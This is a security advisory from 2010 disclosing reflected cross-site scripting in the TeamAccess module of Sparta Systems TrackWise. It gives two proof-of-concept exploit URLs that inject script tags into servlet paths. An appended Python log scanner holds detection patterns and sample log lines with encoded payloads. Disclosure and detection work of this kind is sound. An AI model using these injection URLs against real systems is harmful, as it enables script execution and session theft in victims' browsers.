
Sparta Systems TrackWise TeamAccess Cross Site Scripting

Published: 03 Mar 2010. Reported by: Yaniv Miron. Type: packetstorm. Source: packetstormsecurity.com

Cross-site scripting vulnerability in the TeamAccess module of Sparta Systems TrackWise

`=========================================  
Yaniv Miron aka "Lament" Advisory Feb 28, 2010  
Sparta Systems TrackWise TeamAccess module Multiple Cross Site Scripting Vulnerabilities  
=========================================  
  
=====================  
I. BACKGROUND  
=====================  
TrackWise® by Sparta Systems: A Holistic Approach to Enterprise Quality Management   
  
TrackWise by Sparta Systems is an enterprise quality management solution (EQMS)  
that optimizes quality, ensures compliance and reduces costs for world-class clients  
across a range of industries. TrackWise is the only enterprise quality management  
solution that offers the flexibility and configurability to adapt to company-specific  
business processes, enabling our world-class clients across a range of industries to  
define, track, manage and report on the core activities vital to their success.  
  
http://www.spartasystems.com/trackwise-eqms/  
  
=====================  
II. DESCRIPTION  
=====================  
  
A malicious attacker may inject scripts into the TrackWise application.  
  
=====================  
III. ANALYSIS  
=====================  
  
Exploitation of this vulnerability results in the execution of arbitrary  
script code in the browser of a user who follows a malicious link.  
  
=====================  
IV. EXPLOIT  
=====================  
  
http://example.com/[TrackWiseDir]/servlet/TeamAccess/Login/"><script>alert('XSS-By-Lament')</script>  
  
http://example.com/[TrackWiseDir]/servlet/TeamAccess/BatchEditProgress.html/"><script>alert('XSS-By-Lament')</script>  
  
=====================  
V. DISCLOSURE TIMELINE  
=====================  
  
Jan 2009 Vulnerability Found  
Jan 2009 Vendor Notification  
Feb 2010 Public Disclosure  
  
=====================  
VI. CREDIT  
=====================  
  
Yaniv Miron aka "Lament".  
[email protected]  
`
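
A defender-side check for the two request patterns in section IV, added here as an example and not part of the original advisory: it scans web access log lines for TeamAccess requests whose path still carries quote or angle-bracket characters after percent-decoding. The access log layout (Apache common style), the `/tw` install directory and every sample line are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Servlet prefix shared by both URLs in the advisory; [TrackWiseDir] differs per install.
TEAMACCESS = re.compile(r"/servlet/TeamAccess/", re.IGNORECASE)
# Characters that let trailing path data close an HTML attribute or open a tag.
MARKUP = re.compile(r'["<>]')
# Assumed log layout: client ident user [time] "METHOD target PROTO" status size
REQUEST = re.compile(r'(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST|HEAD) (\S+)')

def fully_decode(path, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%253C) is also seen."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def suspicious_requests(log_lines):
    """Return (client, decoded_path) for TeamAccess requests with markup in the path."""
    hits = []
    for line in log_lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        # The advisory's URLs place the markup in the path, so the query is dropped.
        path = fully_decode(target.split("?", 1)[0])
        prefix = TEAMACCESS.search(path)
        if prefix and MARKUP.search(path[prefix.end():]):
            hits.append((client, path))
    return hits

# Constructed sample lines (documentation addresses, made-up sizes and times).
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Mar/2010:10:00:00 +0000] "GET /tw/servlet/TeamAccess/Login HTTP/1.1" 200 5120',
    '192.0.2.44 - - [03/Mar/2010:10:01:12 +0000] "GET /tw/servlet/TeamAccess/Login/%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5301',
    '192.0.2.45 - - [03/Mar/2010:10:02:30 +0000] "GET /tw/servlet/TeamAccess/BatchEditProgress.html/%2522%253E%253Cscript%253E HTTP/1.1" 200 812',
    '192.0.2.11 - - [03/Mar/2010:10:03:05 +0000] "GET /tw/servlet/TeamAccess/BatchEditProgress.html?id=7 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, path in suspicious_requests(SAMPLE_LOG):
        print(client, path)
```
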
